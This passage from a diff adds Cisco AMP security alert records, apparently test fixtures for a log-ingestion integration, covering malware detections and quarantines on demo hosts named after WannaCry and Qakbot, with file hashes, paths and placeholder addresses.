+                "action": "Threat Detected",
+                "id": "6419204901661835000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419204901661835276",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:17.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.853994603Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419204901661835000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419204897366867979",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:17.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.853996517Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419204901661835000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419204897366867971",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T12:57:46.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.853998395Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6411462922463085000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6411462918168117251",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T12:57:46.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854000301Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6411462922463085000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "detection_id": "6411462918168117252",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T12:57:45.000Z",
+            "file": {
+                "name": "MspthrdHash.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe",
+                "hash": {
+                    "sha1": "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12",
+                    "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91",
+                    "md5": "a97fb86da4e010974860e5024137b56b"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91",
+                    "a97fb86da4e010974860e5024137b56b",
+                    "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854002194Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6411462918168117000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411462918168117252",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T12:32:14.000Z",
+            "file": {
+                "name": "11179468.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe",
+                "hash": {
+                    "sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:23.854004118Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6411456342573187000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.GenericKD:Gen.20fu.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411456342573187074",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T12:32:14.000Z",
+            "file": {
+                "name": "AySxs.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe",
+                "hash": {
+                    "sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:23.854006008Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6411456342573187000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.12081E6CA3-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411456342573187073",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"
+                }
+            },
+            "@timestamp": "2021-01-14T12:27:42.000Z",
+            "file": {
+                "name": "cmd.exe",
+                "path": "/C:/Windows/SysWOW64/cmd.exe",
+                "hash": {
+                    "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 4,
+                "ingested": "2021-09-12T17:32:23.854008008Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T12:27:42.000Z",
+                "action": "Cloud IOC",
+                "id": "1492784107692000800",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.Qakbot.ioc",
+                        "description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T12:27:23.000Z",
+            "file": {
+                "name": "report.pdf.exe",
+                "hash": {
+                    "sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Low_Prev_Retro"
+                ],
+                "hash": [
+                    "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Low_Prev_Retro",
+                "hostname": "Demo_Low_Prev_Retro"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:23.854009893Z",
